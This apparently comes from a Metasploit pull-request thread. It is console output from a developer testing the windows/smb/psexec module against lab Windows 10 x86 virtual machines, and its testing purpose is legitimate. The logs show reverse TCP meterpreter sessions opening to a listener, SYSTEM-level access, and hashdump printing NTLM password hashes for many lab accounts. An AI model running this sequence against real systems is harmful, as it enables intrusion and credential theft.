darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 20 (10.5.134.192) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6e8ef0961855a7312b15a5b80e73c29c::: msf6 exploit(windows/smb/psexec) > ```

bwatters-r7 commented 10 months ago

:green_circle: Windows 10x86

``` msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.199 rhost => 10.5.134.199 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.199:445 - Connecting to the server... [*] 10.5.134.199:445 - Authenticating to 10.5.134.199:445 as user 'vagrant'... [*] 10.5.134.199:445 - Selecting PowerShell target [*] 10.5.134.199:445 - Executing the payload... [+] 10.5.134.199:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.199 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 21 opened (10.5.135.201:4444 -> 10.5.134.199:49725) at 2024-01-18 14:28:21 -0600 [*] Session 21 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.193 rhost => 10.5.134.193 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.193:445 - Connecting to the server... [*] 10.5.134.193:445 - Authenticating to 10.5.134.193:445 as user 'vagrant'... [*] 10.5.134.193:445 - Selecting PowerShell target [*] 10.5.134.193:445 - Executing the payload... [+] 10.5.134.193:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.193 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 22 opened (10.5.135.201:4444 -> 10.5.134.193:49742) at 2024-01-18 14:28:24 -0600 [*] Session 22 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.189 rhost => 10.5.134.189 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.189:445 - Connecting to the server... [*] 10.5.134.189:445 - Authenticating to 10.5.134.189:445 as user 'vagrant'... [*] 10.5.134.189:445 - Selecting PowerShell target [*] 10.5.134.189:445 - Executing the payload... [+] 10.5.134.189:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.189 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 23 opened (10.5.135.201:4444 -> 10.5.134.189:49739) at 2024-01-18 14:28:27 -0600 [*] Session 23 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.167 rhost => 10.5.134.167 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.167:445 - Connecting to the server... [*] 10.5.134.167:445 - Authenticating to 10.5.134.167:445 as user 'vagrant'... [*] 10.5.134.167:445 - Selecting PowerShell target [*] 10.5.134.167:445 - Executing the payload... [+] 10.5.134.167:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.167 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 24 opened (10.5.135.201:4444 -> 10.5.134.167:49712) at 2024-01-18 14:28:29 -0600 [*] Session 24 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.162 rhost => 10.5.134.162 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.162:445 - Connecting to the server... [*] 10.5.134.162:445 - Authenticating to 10.5.134.162:445 as user 'vagrant'... [*] 10.5.134.162:445 - Selecting PowerShell target [*] 10.5.134.162:445 - Executing the payload... [+] 10.5.134.162:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.162 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 25 opened (10.5.135.201:4444 -> 10.5.134.162:49709) at 2024-01-18 14:28:34 -0600 [*] Session 25 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.158 rhost => 10.5.134.158 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.158:445 - Connecting to the server... [*] 10.5.134.158:445 - Authenticating to 10.5.134.158:445 as user 'vagrant'... [*] 10.5.134.158:445 - Selecting PowerShell target [*] 10.5.134.158:445 - Executing the payload... [-] 10.5.134.158:445 - Service failed to start - ACCESS_DENIED [*] Exploit completed, but no session was created. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.148 rhost => 10.5.134.148 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.148:445 - Connecting to the server... [*] 10.5.134.148:445 - Authenticating to 10.5.134.148:445 as user 'vagrant'... [*] 10.5.134.148:445 - Selecting PowerShell target [*] 10.5.134.148:445 - Executing the payload... [+] 10.5.134.148:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.148 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 26 opened (10.5.135.201:4444 -> 10.5.134.148:49731) at 2024-01-18 14:28:54 -0600 [*] Session 26 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.144 rhost => 10.5.134.144 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.144:445 - Connecting to the server... [*] 10.5.134.144:445 - Authenticating to 10.5.134.144:445 as user 'vagrant'... [*] 10.5.134.144:445 - Selecting PowerShell target [*] 10.5.134.144:445 - Executing the payload... [+] 10.5.134.144:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.144 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 27 opened (10.5.135.201:4444 -> 10.5.134.144:49746) at 2024-01-18 14:28:57 -0600 [*] Session 27 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.133 rhost => 10.5.134.133 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.133:445 - Connecting to the server... [*] 10.5.134.133:445 - Authenticating to 10.5.134.133:445 as user 'vagrant'... [*] 10.5.134.133:445 - Selecting PowerShell target [*] 10.5.134.133:445 - Executing the payload... [+] 10.5.134.133:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.133 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 28 opened (10.5.135.201:4444 -> 10.5.134.133:49761) at 2024-01-18 14:29:00 -0600 [*] Session 28 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.117 rhost => 10.5.134.117 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.117:445 - Connecting to the server... [*] 10.5.134.117:445 - Authenticating to 10.5.134.117:445 as user 'vagrant'... [*] 10.5.134.117:445 - Selecting PowerShell target [*] 10.5.134.117:445 - Executing the payload... [+] 10.5.134.117:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.117 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 29 opened (10.5.135.201:4444 -> 10.5.134.117:49741) at 2024-01-18 14:29:02 -0600 [*] Session 29 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.109 rhost => 10.5.134.109 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.109:445 - Connecting to the server... [*] 10.5.134.109:445 - Authenticating to 10.5.134.109:445 as user 'vagrant'... [*] 10.5.134.109:445 - Selecting PowerShell target [*] 10.5.134.109:445 - Executing the payload... [+] 10.5.134.109:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.109 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 30 opened (10.5.135.201:4444 -> 10.5.134.109:49482) at 2024-01-18 14:29:06 -0600 [*] Session 30 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.108 rhost => 10.5.134.108 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.108:445 - Connecting to the server... [*] 10.5.134.108:445 - Authenticating to 10.5.134.108:445 as user 'vagrant'... [*] 10.5.134.108:445 - Selecting PowerShell target [*] 10.5.134.108:445 - Executing the payload... [-] 10.5.134.108:445 - Service failed to start - ACCESS_DENIED [*] Exploit completed, but no session was created. msf6 exploit(windows/smb/psexec) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 21 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_1803 10.5.135.201:4444 -> 10.5.134.199:49725 (10.5.134.199) 22 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_20H2 10.5.135.201:4444 -> 10.5.134.193:49742 (10.5.134.193) 23 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_21H1 10.5.135.201:4444 -> 10.5.134.189:49739 (10.5.134.189) 24 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_1709 10.5.135.201:4444 -> 10.5.134.167:49712 (10.5.134.167) 25 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_1511 10.5.135.201:4444 -> 10.5.134.162:49709 (10.5.134.162) 26 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_1607 10.5.135.201:4444 -> 10.5.134.148:49731 (10.5.134.148) 27 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_1703 10.5.135.201:4444 -> 10.5.134.144:49746 (10.5.134.144) 28 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_2004 10.5.135.201:4444 -> 10.5.134.133:49761 (10.5.134.133) 29 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_1809 10.5.135.201:4444 -> 10.5.134.117:49741 (10.5.134.117) 30 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86 10.5.135.201:4444 -> 10.5.134.109:49482 (10.5.134.109) msf6 exploit(windows/smb/psexec) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 21 (10.5.134.199) Computer : WIN10X86_1803 OS : Windows 10 (10.0 Build 17134). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 22 (10.5.134.193) Computer : WIN10X86_20H2 OS : Windows 10 (10.0 Build 19042). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 23 (10.5.134.189) Computer : WIN10X86_21H1 OS : Windows 10 (10.0 Build 19043). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 24 (10.5.134.167) Computer : WIN10X86_1709 OS : Windows 10 (10.0 Build 16299). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 25 (10.5.134.162) Computer : WIN10X86_1511 OS : Windows 10 (10.0 Build 10586). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 26 (10.5.134.148) Computer : WIN10X86_1607 OS : Windows 10 (10.0 Build 14393). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 27 (10.5.134.144) Computer : WIN10X86_1703 OS : Windows 10 (10.0 Build 15063). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 28 (10.5.134.133) Computer : WIN10X86_2004 OS : Windows 10 (10.0 Build 19041). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 29 (10.5.134.117) Computer : WIN10X86_1809 OS : Windows 10 (10.0 Build 17763). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 30 (10.5.134.109) Computer : WIN10X86 OS : Windows 10 (10.0 Build 10240). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows msf6 exploit(windows/smb/psexec) > sessions -C getuid [*] Running 'getuid' on meterpreter session 21 (10.5.134.199) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 22 (10.5.134.193) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 23 (10.5.134.189) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 24 (10.5.134.167) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 25 (10.5.134.162) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 26 (10.5.134.148) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 27 (10.5.134.144) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 28 (10.5.134.133) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 29 (10.5.134.117) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 30 (10.5.134.109) Server username: NT AUTHORITY\SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C getsystem [*] Running 'getsystem' on meterpreter session 21 (10.5.134.199) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 22 (10.5.134.193) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 23 (10.5.134.189) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 24 (10.5.134.167) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 25 (10.5.134.162) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 26 (10.5.134.148) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 27 (10.5.134.144) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 28 (10.5.134.133) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 29 (10.5.134.117) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 30 (10.5.134.109) [-] Already running as SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 21 (10.5.134.199) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8fd113c3c361b34c776a63da8819595a::: [*] Running 'hashdump' on meterpreter session 22 (10.5.134.193) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:82d0d4232034a07f71390e3324f2fb39::: [*] Running 'hashdump' on meterpreter session 23 (10.5.134.189) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3cef7d00bbd9a772e0f835d1b09a6729::: [*] Running 'hashdump' on meterpreter session 24 (10.5.134.167) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: 